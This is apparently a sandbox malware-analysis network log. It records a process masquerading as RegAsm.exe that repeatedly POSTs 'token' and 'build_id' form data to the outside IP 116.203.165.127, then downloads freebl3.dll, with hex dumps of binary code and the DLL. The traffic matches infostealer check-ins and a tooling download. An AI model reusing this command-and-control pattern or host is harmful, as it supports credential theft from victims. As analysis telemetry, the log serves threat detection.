2024-09-20 09:07:34 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-20 09:07:34 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:36 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:36 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 46 49 49 45 42 47 43 41 4b 4b 45 42 46 42 41 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------JDBFIIEBGCAKKEBFBAAFCont
2024-09-20 09:07:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:38 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:38 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------HDAFIIDAKJDGDHIDAKJJCont
2024-09-20 09:07:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:39 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:39 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------DBAEHCGHIIIDHIECFHJDCont
2024-09-20 09:07:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:40 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:40 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 4a 44 48 43 47 43 42 4b 45 43 42 46 49 4a 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------EGIIJDHCGCBKECBFIJKKContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------EGIIJDHCGCBKECBFIJKKCont
2024-09-20 09:07:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:41 UTC	199	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:41 UTC	260	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:41 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Friday, 20-Sep-2024 09:07:41 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-20 09:07:41 UTC	16124	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-20 09:07:41 UTC	16384	IN	Data Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 Data Ascii: eUeLXee0@eeeue0UEeeUeee $
2024-09-20 09:07:42 UTC	16384	IN	Data Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
